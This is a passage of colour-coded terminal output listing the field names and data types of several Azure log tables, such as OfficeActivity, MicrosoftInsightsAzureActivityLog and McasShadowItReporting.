\u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a0\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a5\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a6\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a7\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a8\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a9\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"acct\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"addr\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"arch\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"argc\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"audit_user\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"auid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"cmd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"comm\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"cwd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"data\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"effective_group\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"effective_user\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"egid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"euid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"exe\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"exit\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"family\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"filetype\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"gid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"group\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"hostname\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"icmptype\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"key\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"name\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"node\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"op\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"path\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"pid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"ppid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"res\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ses\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"success\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"syscall\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"terminal\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"tty\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"uid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"user\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"vm\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"McasShadowItReporting\"\u001b[39;49;00m: {\n        \u001b[94m\"AppCategory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppInstance\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppScore\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AppTags\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"BlockedEvents\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DownloadedBytes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EnrichedUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StreamName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TotalBytes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TotalEvents\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UploadedBytes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"UserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Microservices4SpringApplicationLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"AppName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Log\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Stream\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftInsightsAzureActivityLog\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityStatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivitySubstatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Authorization\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Caller\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Claims\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventDataId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSubmissionTimestamp\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"HTTPRequest\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationNameValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProviderValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebApplicationLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CustomLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionClass\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Host\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Logger\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Method\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Source\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Stacktrace\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WebSiteInstanceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebFunctionExecutionLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionDetails\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FunctionInvocationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FunctionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostInstanceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebStdOutStdErrLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Host\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebW3CLog\"\u001b[39;49;00m: {\n        \u001b[94m\"CIp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CsHost\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CsMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CsUriStem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"OfficeActivity\"\u001b[39;49;00m: {\n        \u001b[94m\"AADTarget\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Actor\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActorContextId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActorIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AffectedItems\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Application\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureActiveDirectory_EventType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Client\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientInfoString\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientMachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Client_IPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CrossMailboxOperations\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"CustomEvent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DataCenterSecurityEventType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestFolder\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxOwnerMasterAccountSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxOwnerSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxOwnerUPN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationFileExtension\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationRelativeUrl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EffectiveOrganization\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationApprovedTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationApprover\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationDuration\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationRequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationRole\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventSource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Event_Data\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalAccess\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Folder\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Folders\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GenericInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InterSystemsId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InternalLogonType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"IntraSystemId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Item\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ItemType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LoginStatus\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"LogonUserDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Logon_Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineDomainInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxOwnerMasterAccountSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxOwnerSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxOwnerUPN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ModifiedObjectResolvedName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ModifiedProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeObjectId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeWorkload\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Operation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OrganizationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OrganizationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OriginatingServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Parameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendAsUserMailboxGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendAsUserSmtp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendOnBehalfOfUserSmtp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendonBehalfOfUserMailboxGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SharingType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Site_\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Site_Url\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceFileExtension\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceRelativeUrl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Source_Name\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start_Time\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"SupportTicketId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetContextId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserKey\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserSharedWith\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Operation\"\u001b[39;49;00m: {\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Detail\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HelpLink\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationCategory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationKey\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Solution\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    